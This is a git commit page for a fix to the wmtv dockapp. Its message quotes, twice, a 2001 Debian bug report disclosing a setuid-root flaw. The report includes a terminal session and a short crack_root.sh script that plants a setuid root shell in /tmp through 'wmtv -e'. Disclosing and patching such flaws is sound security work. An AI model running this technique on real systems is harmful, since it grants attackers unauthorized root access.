| commit | 74bc5a766088185e79c6d7eae0d37e9266881a5a | |
| author | Doug Torrance <dtorrance@piedmont.edu> | |
| Mon, 1 Feb 2016 05:45:10 +0000 (1 00:45 -0500) | ||
| committer | Carlos R. Mafra <crmafra@gmail.com> | |
| Mon, 1 Feb 2016 09:56:00 +0000 (1 15:26 +0530) | ||
| tree | ca5a1723ede8e4bc3ca8132c5eb841666090130e | treesnapshot (tar.gz zip) |
| parent | 199e0065fe7ceeaa852300f10b4203f1627609fd | commitdiff |
wmtv: Fix security hole.
Patch by Nicolas Boullis <Boullis.Nicolas@libertysurf.fr>. From [1]:
From: Nicolas Boullis <Boullis.Nicolas@libertysurf.fr>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: wmtv: dangerous suid root
Date: Thu, 08 Nov 2001 20:07:52 +0100
Hi !
I think there is a huge security hole with wmtv and, when wmtv is installed,
anyone can easily get a root account. Here is what I have in my terminal:
(everytime I launch wmtv, I double-clicked in the tv subwindow to call the
external program)
----------------------------------------------------------------------
Tintin:~> wmtv -e whoami
root
Tintin:~> cat > crack_root.sh
#!/bin/sh
cp /bin/sh /tmp
chmod u+s /tmp/sh
Tintin:~> chmod +x crack_root.sh
Tintin:~> wmtv -e ~/crack_root.sh
Tintin:~> ll /tmp/sh
-rwsr-xr-x 1 root users 407356 Nov 8 19:25 /tmp/sh*
----------------------------------------------------------------------
I tried to make wmtv non-suid root, and... sometimes it works (despite an
error message), sometimes it does not...
----------------------------------------------------------------------
Tintin:~> ll /usr/bin/X11/wmtv
-rwxr-xr-x 1 root root 62588 Jul 31 01:55 /usr/bin/X11/wmtv*
Tintin:~> wmtv
ioctl VIDIOCSFBUF: Operation not permitted
Tintin:~> wmtv
ioctl VIDIOCSFBUF: Operation not permitted
wmtv: no physical frame buffer access
----------------------------------------------------------------------
Hence, I guess you should either correct wmtv so that it always work without
being suid root, or make wmtv lose its privileges before it runs an external
program.
[1] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=118778
Patch by Nicolas Boullis <Boullis.Nicolas@libertysurf.fr>. From [1]:
From: Nicolas Boullis <Boullis.Nicolas@libertysurf.fr>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: wmtv: dangerous suid root
Date: Thu, 08 Nov 2001 20:07:52 +0100
Hi !
I think there is a huge security hole with wmtv and, when wmtv is installed,
anyone can easily get a root account. Here is what I have in my terminal:
(everytime I launch wmtv, I double-clicked in the tv subwindow to call the
external program)
----------------------------------------------------------------------
Tintin:~> wmtv -e whoami
root
Tintin:~> cat > crack_root.sh
#!/bin/sh
cp /bin/sh /tmp
chmod u+s /tmp/sh
Tintin:~> chmod +x crack_root.sh
Tintin:~> wmtv -e ~/crack_root.sh
Tintin:~> ll /tmp/sh
-rwsr-xr-x 1 root users 407356 Nov 8 19:25 /tmp/sh*
----------------------------------------------------------------------
I tried to make wmtv non-suid root, and... sometimes it works (despite an
error message), sometimes it does not...
----------------------------------------------------------------------
Tintin:~> ll /usr/bin/X11/wmtv
-rwxr-xr-x 1 root root 62588 Jul 31 01:55 /usr/bin/X11/wmtv*
Tintin:~> wmtv
ioctl VIDIOCSFBUF: Operation not permitted
Tintin:~> wmtv
ioctl VIDIOCSFBUF: Operation not permitted
wmtv: no physical frame buffer access
----------------------------------------------------------------------
Hence, I guess you should either correct wmtv so that it always work without
being suid root, or make wmtv lose its privileges before it runs an external
program.
[1] https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=118778
| wmtv/src/wmtv.c | diffblobblamehistory |